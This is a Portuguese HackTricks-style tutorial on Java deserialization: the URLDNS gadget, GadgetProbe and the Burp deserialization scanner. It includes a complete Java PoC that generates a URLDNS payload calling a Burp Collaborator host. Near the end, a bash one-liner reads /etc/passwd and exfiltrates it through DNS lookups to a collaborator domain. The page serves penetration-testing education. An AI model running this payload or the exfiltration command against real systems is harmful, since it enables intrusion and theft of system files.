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## Deserialização DNS Java, GadgetProbe e Scanner de Deserialização Java
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## Solicitação DNS na deserialização
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A classe `java.net.URL` implementa `Serializable`, o que significa que essa classe pode ser serializada.
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```java
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public final class URL implements java.io.Serializable {
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```
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Esta classe tem um comportamento curioso. De acordo com a documentação: "**Dois hosts são considerados equivalentes se ambos os nomes de host puderem ser resolvidos para os mesmos endereços IP**".\
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Então, toda vez que um objeto URL chama **qualquer** das funções **`equals`** ou **`hashCode`** uma solicitação **DNS** para obter o endereço IP será **enviada**.
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**Chamar** a função **`hashCode`** **de** um objeto **URL** é bastante fácil, é suficiente inserir este objeto dentro de um `HashMap` que será desserializado. Isso ocorre porque **no final** da função **`readObject`** de `HashMap`, este código é executado:
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```java
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private void readObject(java.io.ObjectInputStream s)
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throws IOException, ClassNotFoundException {
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[ ... ]
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for (int i = 0; i < mappings; i++) {
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[ ... ]
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putVal(hash(key), key, value, false, false);
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}
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```
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Ele vai **executar** o `putVal` com cada valor dentro do `HashMap`. Mas, mais relevante é a chamada para `hash` com cada valor. Este é o código da função `hash`:
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```java
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static final int hash(Object key) {
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int h;
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return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
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}
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```
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Como você pode observar, ao desserializar um `HashMap`, a função `hash` será executada com cada objeto e durante a execução do `hash`, o `.hashCode()` do objeto será executado. Portanto, se você desserializar um `HashMap` contendo um objeto `URL`, o objeto `URL` executará o `.hashCode()`.
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Agora, vamos dar uma olhada no código de `URLObject.hashCode()`:
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```java
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public synchronized int hashCode() {
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if (hashCode != -1)
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return hashCode;
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hashCode = handler.hashCode(this);
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return hashCode;
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```
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Como você pode ver, quando um `URLObject` executa `.hashCode()`, é chamado `hashCode(this)`. A seguir, você pode ver o código desta função:
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```java
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protected int hashCode(URL u) {
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int h = 0;
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// Generate the protocol part.
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String protocol = u.getProtocol();
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if (protocol != null)
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h += protocol.hashCode();
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// Generate the host part.
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InetAddress addr = getHostAddress(u);
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[ ... ]
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```
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Você pode ver que um `getHostAddress` é executado no domínio, **lançando uma consulta DNS**.
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Portanto, essa classe pode ser **abusada** para **lançar** uma **consulta DNS** para **demonstrar** que a **desserialização** é possível, ou até mesmo para **exfiltrar informações** (você pode anexar como subdomínio a saída de uma execução de comando).
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### Exemplo de código de payload URLDNS
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Você pode encontrar o [código de payload URLDNS do ysoserial aqui](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). No entanto, apenas para facilitar o entendimento de como codificá-lo, criei meu próprio PoC (com base no do ysoserial):
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```java
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import java.io.File;
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import java.io.FileInputStream;
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import java.io.FileOutputStream;
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import java.io.IOException;
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import java.io.ObjectInputStream;
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import java.io.ObjectOutputStream;
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import java.lang.reflect.Field;
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import java.net.InetAddress;
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import java.net.URLConnection;
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import java.net.URLStreamHandler;
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import java.util.HashMap;
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import java.net.URL;
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public class URLDNS {
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public static void GeneratePayload(Object instance, String file)
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throws Exception {
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//Serialize the constructed payload and write it to the file
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File f = new File(file);
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ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
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out.writeObject(instance);
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out.flush();
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out.close();
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}
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public static void payloadTest(String file) throws Exception {
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//Read the written payload and deserialize it
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ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
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Object obj = in.readObject();
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System.out.println(obj);
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in.close();
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}
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public static void main(final String[] args) throws Exception {
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String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
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HashMap ht = new HashMap(); // HashMap that will contain the URL
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URLStreamHandler handler = new SilentURLStreamHandler();
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URL u = new URL(null, url, handler); // URL to use as the Key
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ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
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// During the put above, the URL's hashCode is calculated and cached.
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// This resets that so the next time hashCode is called a DNS lookup will be triggered.
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final Field field = u.getClass().getDeclaredField("hashCode");
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field.setAccessible(true);
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field.set(u, -1);
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//Test the payloads
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GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
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}
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}
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class SilentURLStreamHandler extends URLStreamHandler {
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protected URLConnection openConnection(URL u) throws IOException {
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return null;
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}
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protected synchronized InetAddress getHostAddress(URL u) {
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return null;
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}
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}
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```
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### Mais informações
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* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
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* Na ideia original, a carga útil de coleções comuns foi alterada para realizar uma consulta DNS, o que era menos confiável do que o método proposto, mas este é o post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
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## GadgetProbe
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Você pode baixar o [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) da Burp Suite App Store (Extender).
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**GadgetProbe** tentará descobrir se algumas **classes Java existem** na classe Java do servidor para que você possa saber **se** ele é **vulnerável** a algum exploit conhecido.
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### Como funciona
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**GadgetProbe** usará a mesma **carga útil DNS da seção anterior**, mas **antes** de executar a consulta DNS, ele tentará **desserializar uma classe arbitrária**. Se a **classe arbitrária existir**, a **consulta DNS** será **enviada** e o GadgProbe notará que essa classe existe. Se a **solicitação DNS não for enviada**, isso significa que a **classe arbitrária não foi desserializada** com sucesso, portanto, ela não está presente ou não é **serializável/exploitável**.
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Dentro do github, [**GadgetProbe tem algumas listas de palavras**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) com classes Java para serem testadas.
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![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
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### Mais informações
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* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
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## Scanner de desserialização Java
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Este scanner pode ser **baixado** da Burp App Store (**Extender**).\
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A **extensão** tem **capacidades** passivas e ativas.
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### Passivo
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Por padrão, ele **verifica passivamente** todas as solicitações e respostas enviadas **procurando** por **bytes mágicos serializados Java** e apresentará um aviso de vulnerabilidade se algum for encontrado:
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![](<../../.gitbook/assets/image (290).png>)
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### Ativo
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**Teste manual**
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Você pode selecionar uma solicitação, clicar com o botão direito e `Enviar solicitação para DS - Teste manual`.\
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Em seguida, dentro da guia _Deserialization Scanner_ --> guia _Teste manual_, você pode selecionar o **ponto de inserção**. E **iniciar o teste** (selecione o ataque apropriado dependendo da codificação usada).
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![](../../.gitbook/assets/3-1.png)
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Mesmo que isso seja chamado de "teste manual", é bastante **automatizado**. Ele verificará automaticamente se a **desserialização** é **vulnerável** a **qualquer carga útil ysoserial** verificando as bibliotecas presentes no servidor da web e destacará as vulneráveis. Para **verificar** as **bibliotecas vulneráveis**, você pode selecionar para lançar **Javas Sleeps**, **sleeps** via **consumo de CPU** ou usando **DNS**, como mencionado anteriormente.
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**Explorando**
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Depois de identificar uma biblioteca vulnerável, você pode enviar a solicitação para a guia _Explorando_.\
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Nesta guia, você deve **selecionar** o **ponto de injeção** novamente, escrever a **biblioteca vulnerável** para a qual deseja criar uma carga útil e o **comando**. Em seguida, basta pressionar o botão de **Ataque** apropriado.
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![](<../../.gitbook/assets/4 (1).png>)
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### Informações de exfiltração DNS de desserialização Java
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Faça sua carga útil executar algo como o seguinte:
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```bash
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(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
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```
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### Mais Informações
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* [https://techblog.mediaservice.net/2017/05/descoberta-e-exploracao-confiaveis-de-vulnerabilidades-de-deserializacao-java/](https://techblog.mediaservice.net/2017/05/descoberta-e-exploracao-confiaveis-de-vulnerabilidades-de-deserializacao-java/)
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* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
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* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
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* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
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* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
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|
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
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